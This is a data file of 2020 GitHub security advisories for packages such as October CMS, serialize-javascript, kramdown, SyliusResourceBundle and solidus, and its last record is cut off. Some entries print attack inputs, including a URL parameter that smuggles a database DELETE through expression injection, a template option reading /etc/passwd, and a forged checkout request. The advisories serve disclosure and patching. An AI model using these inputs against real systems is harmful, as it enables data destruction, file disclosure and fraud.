+1.4.0,GHSA-5j4m-89xf-mf5p,2020-08-27T22:58:46Z,2020-08-27T22:58:46Z,2020-08-27T22:58:46Z,[],Missing Origin Validation in parcel-bundler,Withdrawn: Duplicate of GHSA-37q6-576q-vgr7,[],"[{'package': {'ecosystem': 'npm', 'name': 'parcel-bundler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/parcel-bundler/parcel/issues/1783'}, {'type': 'WEB', 'url': 'https://github.com/parcel-bundler/parcel/pull/1794'}, {'type': 'WEB', 'url': 'https://github.com/parcel-bundler/parcel/commit/066e0bf6bd26b15c78bd47df023452e4b20073e4'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/721'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-04T15:44:00Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w4pj-7p68-3vgv,2023-01-31T01:29:13Z,2020-08-05T14:52:44Z,,['CVE-2020-11083'],Stored XSS in October,"### Impact
+A user with access to a markdown FormWidget that stores data persistently could create a stored XSS attack against themselves and any other users with access to the generated HTML from the field.
+
+### Patches
+Issue has been patched in Build 466 (v1.0.466) & RainLab.Blog v1.4.1 by restricting the ability to store JS in markdown to only users that have been explicitly granted the `backend.allow_unsafe_markdown` permission.
+
+### Workarounds
+Apply https://github.com/octobercms/october/commit/9ecfb4867baae14a0d3f99f5b5c1e8a979ae8746 & https://github.com/rainlab/blog-plugin/commit/6ae19a6e16ef3ba730692bc899851342c858bb94 to your installation manually if unable to upgrade to Build 466 or v1.4.1 of RainLab.Blog (if using that plugin).
+
+### References
+Reported by [Sivanesh Ashok](https://stazot.com/)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)
+
+### Threat assessment:
+ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'october/backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.319'}, {'fixed': '1.0.466'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/octobercms/october/security/advisories/GHSA-w4pj-7p68-3vgv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11083'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/october/commit/9ecfb4867baae14a0d3f99f5b5c1e8a979ae8746'}, {'type': 'WEB', 'url': 'https://github.com/rainlab/blog-plugin/commit/6ae19a6e16ef3ba730692bc899851342c858bb94'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/158730/October-CMS-Build-465-XSS-File-Read-File-Deletion-CSV-Injection.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2020/Aug/2'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-07-28T19:36:22Z', 'nvd_published_at': '2020-07-14T21:15:00Z'}"
+1.4.0,GHSA-hxcc-f52p-wc94,2021-09-23T18:50:59Z,2020-08-11T17:21:13Z,,['CVE-2020-7660'],Insecure serialization leading to RCE in serialize-javascript,"serialize-javascript prior to 3.1.0 allows remote attackers to inject arbitrary code via the function ""deleteFunctions"" within ""index.js"".
+
+An object such as `{""foo"": /1""/, ""bar"": ""a\""@__R--0__@""}` was serialized as `{""foo"": /1""/, ""bar"": ""a\/1""/}`, which allows an attacker to escape the `bar` key. This requires the attacker to control the values of both `foo` and `bar` and guess the value of ``. The UID has a keyspace of approximately 4 billion making it a realistic network attack.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'serialize-javascript'}, 'ecosystem_specific': {'affected_functions': ['serialize-javascript']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7660'}, {'type': 'WEB', 'url': 'https://github.com/yahoo/serialize-javascript/commit/f21a6fb3ace2353413761e79717b2d210ba6ccbd'}, {'type': 'PACKAGE', 'url': 'https://github.com/yahoo/serialize-javascript'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-11T14:14:51Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mqm2-cgpr-p4m6,2022-04-29T20:26:19Z,2020-08-07T22:27:41Z,,['CVE-2020-14001'],Unintended read access in kramdown gem,"The kramdown gem before 2.3.0 for Ruby processes the template option inside Kramdown documents by default, which allows unintended read access (such as template=""/etc/passwd"") or unintended embedded Ruby code execution (such as a string that begins with template=""string://<%= `). NOTE: kramdown is used in Jekyll, GitLab Pages, GitHub Pages, and Thredded Forum.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'kramdown'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-14001'}, {'type': 'WEB', 'url': 'https://github.com/gettalong/kramdown/commit/1b8fd33c3120bfc6e5164b449e2c2fc9c9306fde'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-mqm2-cgpr-p4m6'}, {'type': 'PACKAGE', 'url': 'https://github.com/gettalong/kramdown'}, {'type': 'WEB', 'url': 'https://github.com/gettalong/kramdown/compare/REL_2_2_1...REL_2_3_0'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/kramdown/CVE-2020-14001.yml'}, {'type': 'WEB', 'url': 'https://kramdown.gettalong.org'}, {'type': 'WEB', 'url': 'https://kramdown.gettalong.org/news.html'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r96df7899fbb456fe2705882f710a0c8e8614b573fbffd8d12e3f54d2@%3Cnotifications.fluo.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/08/msg00014.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ENMMGKHRQIZ3QKGOMBBBGB6B4LB5I7NQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBLTGBYU7NKOUOHDKVCU4GFZMGA6BP4L/'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/kramdown'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200731-0004/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4562-1/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4743'}]","{'cwe_ids': ['CWE-862'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-07T22:27:22Z', 'nvd_published_at': '2020-07-17T16:15:00Z'}"
+1.4.0,GHSA-4r3m-j6x5-48m3,2021-01-07T23:39:22Z,2020-08-28T21:20:42Z,,['CVE-2020-15155'],Cross Site Scripting(XSS) Vulnerability in Latest Release 4.3.6 Site basic settings,baserCMS 4.3.6 and earlier is affected by Cross Site Scripting (XSS) via arbitrary script execution. Admin access is required to exploit this vulnerability. The affected components is toolbar.php. The issue is fixed in version 4.3.7.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'baserproject/basercms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.3.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.3.6'}}]","[{'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/security/advisories/GHSA-4r3m-j6x5-48m3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15155'}, {'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/commit/94cbfab74c9fd6d04492597a1a684674c3c0e30f'}, {'type': 'WEB', 'url': 'https://basercms.net/security/20200827'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-28T21:20:29Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7257-96vg-qf6x,2021-11-19T15:31:10Z,2020-08-21T17:03:24Z,,['CVE-2020-15147'],Remote Code Execution in Red Discord Bot,"### Impact
+A RCE exploit has been discovered in the Streams module: this exploit allows Discord users with specifically crafted ""going live"" messages to inject code into the Streams module's going live message. By abusing this exploit, it's possible to perform destructive actions and/or access sensitive information.
+
+### Patches
+This critical exploit has been fixed on version ``3.3.12`` & ``3.4``.
+
+### Workarounds
+Unloading the Streams module with ``unload streams`` can render this exploit not accessible. We still highly recommend updating to ``3.3.12`` or ``3.4`` to completely patch this issue.
+
+### References
+* https://github.com/Cog-Creators/Red-DiscordBot/pull/4183
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [Cog-Creators/Red-DiscordBot](https://github.com/Cog-Creators/Red-DiscordBot)
+* Over on our [Discord server](https://discord.gg/red)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Red-DiscordBot'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.12'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.11'}}]","[{'type': 'WEB', 'url': 'https://github.com/Cog-Creators/Red-DiscordBot/security/advisories/GHSA-7257-96vg-qf6x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15147'}, {'type': 'WEB', 'url': 'https://github.com/Cog-Creators/Red-DiscordBot/pull/4183'}, {'type': 'WEB', 'url': 'https://github.com/Cog-Creators/Red-DiscordBot/pull/4183/commits/e269ea0d3bc88417163c18431b1df38a9be92bfc'}, {'type': 'PACKAGE', 'url': 'https://github.com/Cog-Creators/Red-DiscordBot/'}]","{'cwe_ids': ['CWE-74', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-21T17:02:40Z', 'nvd_published_at': '2020-08-21T18:15:00Z'}"
+1.4.0,GHSA-h6m7-j4h3-9rf5,2021-11-19T15:36:47Z,2020-08-19T19:52:30Z,,['CVE-2020-15146'],Remote Code Execution in SyliusResourceBundle,"### Impact
+
+Request parameters injected inside an expression evaluated by `symfony/expression-language` package haven't been sanitized properly. This allows the attacker to access any public service by manipulating that request parameter, allowing for Remote Code Execution.
+
+The vulnerable versions include: `<=1.3.13 || >=1.4.0 <=1.4.6 || >=1.5.0 <=1.5.1 || >=1.6.0 <=1.6.3`.
+
+### Example
+
+```yaml
+sylius_grid:
+ grids:
+ foo:
+ fields:
+ bar:
+ options:
+ baz: ""expr:service('sylius.repository.product').find($id)""
+```
+
+In this case, `$id` can be prepared in a way that calls other services.
+
+If you visit `/route?id=""~service('doctrine').getManager().getConnection().executeQuery(""DELETE * FROM TABLE"")~""`, it will result in a following expression `expr:service('repository').find(""""~service('doctrine').getManager().getConnection().executeQuery(""DELETE * FROM TABLE"")~"""")`, which will execute a query on the currently connected database.
+
+To find a vulnerability in your application, look for any routing definition that uses request parameters inside expression language.
+
+### Patches
+
+This issue has been patched for versions 1.3.14, 1.4.7, 1.5.2 and 1.6.4. Versions prior to 1.3 were not patched.
+
+### Workarounds
+
+The fix requires adding `addslashes` in `OptionsParser::parseOptionExpression` to sanitize user input before evaluating it using the expression language.
+
+```php
+- return is_string($variable) ? sprintf('""%s""', $variable) : $variable;
++ return is_string($variable) ? sprintf('""%s""', addslashes($variable)) : $variable;
+```
+
+### Acknowledgements
+
+This security issue has been reported by Craig Blanchette (@isometriks), thanks a lot!
+
+### For more information
+
+If you have any questions or comments about this advisory:
+* Email us at [security@sylius.com](mailto:security@sylius.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'sylius/resource-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.14'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/resource-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.4.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/resource-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/resource-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.6.0'}, {'fixed': '1.6.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Sylius/SyliusResourceBundle/security/advisories/GHSA-h6m7-j4h3-9rf5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15146'}, {'type': 'WEB', 'url': 'https://github.com/Sylius/SyliusResourceBundle/commit/73d9aba182947473a5935b31caf65ca263091e00'}, {'type': 'PACKAGE', 'url': 'https://github.com/Sylius/SyliusResourceBundle'}]","{'cwe_ids': ['CWE-74', 'CWE-917'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-19T19:50:49Z', 'nvd_published_at': '2020-08-20T01:17:00Z'}"
+1.4.0,GHSA-w542-cpp9-r3g7,2023-07-05T20:19:49Z,2020-08-05T14:53:34Z,,['CVE-2020-16252'],Field Test CSRF vulnerability,"The Field Test dashboard is vulnerable to cross-site request forgery (CSRF) with non-session based authentication methods in versions v0.2.0 through v0.3.2.
+
+## Impact
+The Field Test dashboard is vulnerable to CSRF with non-session based authentication methods, like basic authentication. Session-based authentication methods (like Devise's default authentication) are not affected.
+
+A CSRF attack works by getting an authorized user to visit a malicious website and then performing requests on behalf of the user. In this instance, a single endpoint is affected, which allows for changing the variant assigned to a user.
+
+All users running an affected release should upgrade immediately.
+
+## Technical Details
+Field Test uses the `protect_from_forgery` method from Rails to prevent CSRF. However, this defaults to `:null_session`, which has no effect on non-session based authentication methods. This has been changed to `protect_from_forgery with: :exception`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'field_test'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.0'}, {'fixed': '0.4.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.3.2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-16252'}, {'type': 'WEB', 'url': 'https://github.com/ankane/field_test/issues/28'}, {'type': 'WEB', 'url': 'https://github.com/ankane/field_test/commit/defd3fdf457c22d7dc5b3be7048481947bd5f0d0'}, {'type': 'PACKAGE', 'url': 'https://github.com/ankane/field_test'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/field_test/CVE-2020-16252.yml'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-05T14:47:06Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pwqf-9h7j-7mv8,2021-09-23T19:05:25Z,2020-08-21T16:25:26Z,,['CVE-2020-6174'],Incorrect threshold signature computation in TUF,"### Impact
+Metadadata signature verification, as used in `tuf.client.updater`, counted each of multiple signatures with identical authorized keyids separately towards the threshold. Therefore, an attacker with access to a valid signing key could create multiple valid signatures in order to meet the minimum threshold of keys before the metadata was considered valid.
+
+The tuf maintainers would like to thank Erik MacLean of Analog Devices, Inc. for reporting this issue.
+
+### Patches
+A [fix](https://github.com/theupdateframework/tuf/pull/974) is available in version [0.12.2](https://github.com/theupdateframework/tuf/releases/tag/v0.12.2) or newer.
+
+### Workarounds
+No workarounds are known for this issue.
+
+### References
+* [CVE-2020-6174](https://nvd.nist.gov/vuln/detail/CVE-2020-6174)
+* Pull request resolving the issue [PR 974](https://github.com/theupdateframework/tuf/pull/974)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tuf'}, 'ecosystem_specific': {'affected_functions': ['tuf.sig.verify']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/theupdateframework/tuf/security/advisories/GHSA-pwqf-9h7j-7mv8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-6174'}, {'type': 'WEB', 'url': 'https://github.com/theupdateframework/tuf/pull/974'}, {'type': 'WEB', 'url': 'https://github.com/theupdateframework/tuf/pull/974/commits/a0397c7c820ec1c30ebc793cc9469b61c8d3f50e'}, {'type': 'WEB', 'url': 'https://github.com/theupdateframework/python-tuf/commit/2977188139d065ff3356c3cb4aec60c582b57e0e'}, {'type': 'PACKAGE', 'url': 'https://github.com/theupdateframework/tuf'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-21T16:25:02Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xw5p-hw6r-2j98,2020-08-03T21:25:40Z,2020-08-05T14:53:22Z,,['CVE-2020-8192'],Denial of service in fastify,A denial of service vulnerability exists in Fastify v2.14.1 and v3.0.0-rc.4 that allows a malicious user to trigger resource exhaustion (when the allErrors option is used) with specially crafted schemas.,[],"[{'package': {'ecosystem': 'npm', 'name': 'fastify'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.15.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8192'}, {'type': 'WEB', 'url': 'https://github.com/fastify/fastify/commit/74c3157ca90c3ffed9e4434f63c2017471ec970e'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/903521'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-03T21:25:40Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4x7c-cx64-49w8,2020-08-19T22:06:03Z,2020-08-19T22:06:03Z,2020-08-19T22:06:03Z,[],Regular Expression Denial of Service in is-my-json-valid,Withdrawn: Duplicate of GHSA-f522-ffg8-j8r6,[],"[{'package': {'ecosystem': 'npm', 'name': 'is-my-json-valid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.17.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'is-my-json-valid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mafintosh/is-my-json-valid/pull/159'}, {'type': 'WEB', 'url': 'https://github.com/mafintosh/is-my-json-valid/commit/b3051b277f7caa08cd2edc6f74f50aeda65d2976'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2019-06-12T16:28:24Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wwrj-35w6-77ff,2021-01-07T23:42:18Z,2020-08-04T14:54:08Z,,['CVE-2020-15135'],CSRF vulnerability in save-server,"### Impact
+Versions prior to version v1.05 are affected by a CSRF vulnerability, as there is no CSRF mitigation (Tokens etc.). The fix introduced in version v1.05 unintentionally breaks uploading so version v1.0.7 is the fixed version.
+
+This is patched by implementing [Double submit](https://medium.com/cross-site-request-forgery-csrf/double-submit-cookie-pattern-65bb71d80d9f).
+
+The CSRF attack would require you to navigate to a malicious site while you have an active session with Save-Server (Session key stored in cookies). The malicious user would then be able to perform some actions, including:
+- Upload file
+- Delete file
+- Add redirect
+
+
+#### If you are logged in as root, this attack is significantly more severe. They can (in addition to the above):
+- Create users
+- Delete users
+- Update users (change password)
+
+If they updated the password of a user, that user's files would then be available. If the root password is updated, all files would be visible if they logged in with the new password.
+
+Note that due to the same origin policy malicious actors cannot view the gallery or the response of any of the methods, nor be sure they succeeded.
+### Patches
+This issue has been patched. Update to version v1.0.7 or above to benefit from this fix.
+
+### Workarounds
+None. You should upgrade.
+
+### References
+What is CSRF: https://owasp.org/www-community/attacks/csrf
+Fix type: https://medium.com/cross-site-request-forgery-csrf/double-submit-cookie-pattern-65bb71d80d9f
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [Save-server](https://github.com/Neztore/save-server/)
+* Email us at [hi@nezto.re](mailto:hi@nezto.re)
+* Join our discord (preferred): [Invite](https://discord.gg/QevWabU) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'save-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '< 1.0.5'}}]","[{'type': 'WEB', 'url': 'https://github.com/Neztore/save-server/security/advisories/GHSA-wwrj-35w6-77ff'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15135'}, {'type': 'WEB', 'url': 'https://medium.com/cross-site-request-forgery-csrf/double-submit-cookie-pattern-65bb71d80d9f'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/save-server'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-04T14:53:13Z', 'nvd_published_at': None}"
+1.4.0,GHSA-55mm-5399-7r63,2021-03-04T18:25:42Z,2020-08-05T14:52:54Z,,['CVE-2020-15128'],Reliance on Cookies without validation in OctoberCMS,"### Impact
+Previously encrypted cookie values were not tied to the name of the cookie the value belonged to. This meant that certain classes of attacks that took advantage of other theoretical vulnerabilities in user facing code (nothing exploitable in the core project itself) had a higher chance of succeeding.
+
+Specifically, if your usage exposed a way for users to provide unfiltered user input and have it returned to them as an encrypted cookie (ex. storing a user provided search query in a cookie) they could then use the generated cookie in place of other more tightly controlled cookies; or if your usage exposed the plaintext version of an encrypted cookie at any point to the user they could theoretically provide encrypted content from your application back to it as an encrypted cookie and force the framework to decrypt it for them.
+
+### Patches
+Issue has been patched in Build 468 (v1.0.468).
+
+>**NOTE**: If you are using the cookie session driver, all of your session data will be invalidated. All other session drivers should smoothly upgrade to the changes (although the backend authentication persist cookie will also be invalidated requiring users to login again once their current session expires).
+
+### Workarounds
+Apply https://github.com/octobercms/library/commit/28310d4fb336a1741b39498f4474497644a6875c to your installation manually if unable to upgrade to Build 468.
+
+### References
+- https://blog.laravel.com/laravel-cookie-security-releases
+- https://github.com/laravel/framework/compare/4c7d118181d6c7f1f883643702df807ced016c5e...a731824421f9ebc586728ea9c7cff231a249aaa9
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)
+
+### Threat Assessment
+Assessed as Low given that it is not directly exploitable within the core but requires other security vulnerabilities within the application to have an effect and the severity of its effect depends entirely on the severity of those other holes in the application's defences.
+
+### Acknowledgements
+
+Thanks to [Takashi Terada of Mitsui Bussan Secure Directions, Inc.](https://www.linkedin.com/in/takeshi-terada-b570a6100/) for finding the original issue in Laravel and @taylorotwell for sharing the report with the October CMS team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'october/rain'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.319'}, {'fixed': '1.0.468'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/octobercms/october/security/advisories/GHSA-55mm-5399-7r63'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15128'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/library/pull/508'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/library/commit/28310d4fb336a1741b39498f4474497644a6875c'}]","{'cwe_ids': ['CWE-327', 'CWE-565'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-31T17:44:58Z', 'nvd_published_at': '2020-07-31T18:15:00Z'}"
+1.4.0,GHSA-vrv8-v4w8-f95h,2023-05-22T14:51:38Z,2020-08-11T14:55:01Z,,['CVE-2020-12648'],Cross-site scripting vulnerability in TinyMCE,"### Impact
+A cross-site scripting (XSS) vulnerability was discovered in the core parser. The vulnerability allowed arbitrary JavaScript execution when inserting a specially crafted piece of content into the editor via the clipboard or APIs. This impacts all users who are using TinyMCE 4.9.10 or lower and TinyMCE 5.4.0 or lower.
+
+### Patches
+This vulnerability has been patched in TinyMCE 4.9.11 and 5.4.1 by improved HTML parsing and sanitization logic.
+
+### Workarounds
+The workarounds available are:
+- upgrade to either TinyMCE 4.9.11 or TinyMCE 5.4.1
+or
+- enable the media plugin, which overrides the default parsing behaviour for iframes
+or
+- add the following workaround to update the parsing schema rules for iframes:
+
+#### Example: Change the default schema for iframes
+```js
+setup: function(editor) {
+ editor.on('PreInit', function() {
+ editor.schema.getSpecialElements()['iframe'] = /]*>/gi;
+ });
+}
+```
+
+### Acknowledgements
+Tiny Technologies would like to thank George Steketee and Chris Davis at [Bishop Fox](https://www.bishopfox.com/) for discovering this vulnerability.
+
+### References
+https://www.tiny.cloud/docs/release-notes/release-notes54/#securityfixes
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues)
+* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'tinymce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.9.11'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'tinymce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tinymce/tinymce/security/advisories/GHSA-vrv8-v4w8-f95h'}, {'type': 'WEB', 'url': 'https://github.com/tinymce/tinymce/pull/5843'}, {'type': 'WEB', 'url': 'https://github.com/tinymce/tinymce/commit/2b71c922214d388838d930806207a66c14e80f63'}, {'type': 'WEB', 'url': 'https://github.com/tinymce/tinymce/commit/696e43658dc9750ec24fdc4650bd2be9653daf5b'}, {'type': 'PACKAGE', 'url': 'https://github.com/tinymce/tinymce'}, {'type': 'WEB', 'url': 'https://www.tiny.cloud/docs/release-notes/release-notes54/#securityfixes'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-10T22:39:05Z', 'nvd_published_at': '2020-08-14T14:15:00Z'}"
+1.4.0,GHSA-69p9-9qm9-h447,2020-08-19T22:34:43Z,2020-08-19T22:34:43Z,2020-08-19T22:34:43Z,[],Sandbox Breakout / Arbitrary Code Execution in safer-eval,Withdrawn: Duplicate of GHSA-hgch-jjmr-gp7w,[],"[{'package': {'ecosystem': 'npm', 'name': 'safer-eval'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/commenthol/safer-eval/commit/1c29f6a6e304fb650c05056e217e457a0d2cc3c5'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/787'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/787/versions'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-05T13:59:29Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3mvg-rrrw-m7ph,2021-11-19T15:41:33Z,2020-08-04T22:17:57Z,,['CVE-2020-15109'],Ability to change order address without triggering address validations in solidus,"### Impact
+
+This vulnerability allows a malicious customer to craft request data with parameters that allow changing the address of the current order without changing the shipment costs associated with the new shipment.
+
+All stores with at least two shipping zones and different costs of shipment per zone are impacted.
+
+E.g.
+1. Store admin configured the store so that there are two zones in US:
+- East Cost Zone - Shipping Method cost: $1
+- West Cost Zone - Shipping Method cost: $10
+
+The attacker user can know that shipping to NY is less expensive than to LA just by testing different addresses in checkout.
+
+2. The attacker user enters any NY shipping address in the address step
+3. The attacker user chooses the $1 delivery option
+4. The attacker user crafts a request with their real LA address, similar to:
+
+```
+// POST #checkout/update:
+
+{
+ state: 'payment',
+ order: {
+ ship_address_attributes: {
+ city: 'Los Angeles',
+ ...
+ }
+ }
+}
+```
+5. The attacker user proceeds with checking out with a new address and the $1 shipment costs.
+
+Another scenario where this could be dangerous is:
+
